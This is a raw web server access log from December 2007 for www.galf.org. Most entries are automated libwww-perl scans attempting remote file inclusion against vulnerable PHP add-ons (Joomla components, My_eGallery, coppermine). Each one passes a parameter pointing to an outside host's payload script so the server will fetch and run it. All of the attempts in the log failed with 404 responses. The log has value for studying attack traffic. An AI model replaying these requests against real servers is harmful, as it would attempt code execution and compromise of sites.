64.79.215.67 - - [02/Dec/2007:18:29:44 -0800] "GET /logs//include.php?path[docroot]=http://www.daynger.com/blog/wp-componenents/.tmp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.79.215.67 - - [02/Dec/2007:18:29:45 -0800] "GET //include.php?path[docroot]=http://www.daynger.com/blog/wp-componenents/.tmp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.151.48.18 - - [02/Dec/2007:18:30:49 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.151.48.18 - - [02/Dec/2007:18:30:50 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.102.0.108 - - [02/Dec/2007:18:32:35 -0800] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.102.0.108 - - [02/Dec/2007:18:32:36 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.235.97.70 - - [02/Dec/2007:18:32:37 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.175.205.226 - - [02/Dec/2007:18:32:55 -0800] "GET /logs/access_071015.log//login.php?dir=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:18:32:56 -0800] "GET //login.php?dir=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:18:32:56 -0800] "GET /logs//login.php?dir=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:18:33:45 -0800] "GET /logs/access_070903.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:34:38 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [02/Dec/2007:18:35:53 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [02/Dec/2007:18:35:53 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [02/Dec/2007:18:35:54 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [02/Dec/2007:18:36:49 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:37:07 -0800] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:37:08 -0800] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
80.58.205.45 - - [02/Dec/2007:18:37:21 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.58.205.45 - - [02/Dec/2007:18:37:22 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:38:57 -0800] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:38:57 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:38:58 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
203.157.182.9 - - [02/Dec/2007:18:40:11 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
80.190.193.116 - - [02/Dec/2007:18:40:19 -0800] "GET /logs/access_071001.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:40:58 -0800] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:40:58 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:40:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:41:15 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:41:15 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.22 - - [02/Dec/2007:18:42:08 -0800] "GET /labia/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:18:46:34 -0800] "GET /logs/access_071105.log/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:18:46:35 -0800] "GET /default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:18:46:37 -0800] "GET /logs/default.php?page=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:47:20 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
207.44.232.41 - - [02/Dec/2007:18:47:20 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:47:20 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:47:22 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:18:47:31 -0800] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
203.157.182.9 - - [02/Dec/2007:18:47:31 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:48:06 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:48:07 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.189.224.45 - - [02/Dec/2007:18:48:11 -0800] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:48:17 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.6.22.173 - - [02/Dec/2007:18:48:41 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:18:49:29 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:18:49:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:51:30 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:51:31 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:51:31 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.232.41 - - [02/Dec/2007:18:52:16 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:53:19 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:53:19 -0800] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:53:19 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:18:53:19 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:18:58:43 -0800] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:18:58:55 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:18:58:56 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:18:58:57 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:19:02:13 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:19:02:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:19:02:28 -0800] "GET /logs/access_071001.log//login.php?dir=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:19:02:31 -0800] "GET /logs/access_070826.log//modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.149.230.152 - - [02/Dec/2007:19:02:31 -0800] "GET //modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.12.48.214 - - [02/Dec/2007:19:02:31 -0800] "GET //modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:19:02:32 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:19:02:51 -0800] "GET /logs/access_070730.log//modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
202.60.74.106 - - [02/Dec/2007:19:06:48 -0800] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:19:06:49 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:19:06:49 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.30.221.50 - - [02/Dec/2007:19:06:56 -0800] "GET /logs/access_070709.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:19:09:07 -0800] "GET /logs/access_071119.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.173 - - [02/Dec/2007:19:11:13 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:19:11:49 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.27.3 - - [02/Dec/2007:19:11:50 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.12.48.214 - - [02/Dec/2007:19:14:40 -0800] "GET /logs/access_070826.log//modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.12.48.214 - - [02/Dec/2007:19:14:41 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.12.48.214 - - [02/Dec/2007:19:14:44 -0800] "GET /logs/access_070730.log//modules/My_eGallery/index.php?basepath=http://www.pavomexicano.com/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.232 - - [02/Dec/2007:19:17:21 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:19:20:02 -0800] "GET /logs/access_071014.log/includes/db_connect.php?baseDir=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.185.250 - - [02/Dec/2007:19:20:02 -0800] "GET /includes/db_connect.php?baseDir=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:19:20:03 -0800] "GET /logs/includes/db_connect.php?baseDir=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
200.29.0.8 - - [02/Dec/2007:19:20:48 -0800] "GET /logs/access_071022.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.29.0.8 - - [02/Dec/2007:19:20:49 -0800] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.29.0.8 - - [02/Dec/2007:19:20:49 -0800] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.29.0.8 - - [02/Dec/2007:19:21:44 -0800] "GET /logs/access_070903.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:19:22:21 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:19:22:21 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:19:22:22 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
217.199.98.177 - - [02/Dec/2007:19:24:07 -0800] "GET /logs/main.php?id=http://basink.web.id/n.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
217.151.228.18 - - [02/Dec/2007:19:24:09 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:19:24:10 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:19:24:12 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.195.47.248 - - [02/Dec/2007:19:27:49 -0800] "GET /logs/access_071014.log/includes/db_connect.php?baseDir=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.195.47.248 - - [02/Dec/2007:19:27:49 -0800] "GET /includes/db_connect.php?baseDir=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.195.47.248 - - [02/Dec/2007:19:27:49 -0800] "GET /logs/includes/db_connect.php?baseDir=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.45.243.162 - - [02/Dec/2007:19:29:29 -0800] "GET /logs/access_070820.log/index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.45.243.162 - - [02/Dec/2007:19:29:29 -0800] "GET /index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.45.243.162 - - [02/Dec/2007:19:29:29 -0800] "GET /logs/index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.45.243.162 - - [02/Dec/2007:19:29:29 -0800] "GET /logs/access_070730.log/index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:19:31:31 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.122.224.146 - - [02/Dec/2007:19:31:37 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:19:31:42 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
66.98.150.12 - - [02/Dec/2007:19:32:21 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.ziaaddils.uklinux.net/bookmark4u/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:19:32:21 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.ziaaddils.uklinux.net/bookmark4u/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:19:38:03 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
74.6.22.173 - - [02/Dec/2007:19:38:14 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 1121534 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:19:40:52 -0800] "GET /logs/access_071112.log/talkback/comments-display-tpl.php?language_file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:19:40:52 -0800] "GET /talkback/comments-display-tpl.php?language_file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [02/Dec/2007:19:40:53 -0800] "GET /logs/talkback/comments-display-tpl.php?language_file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
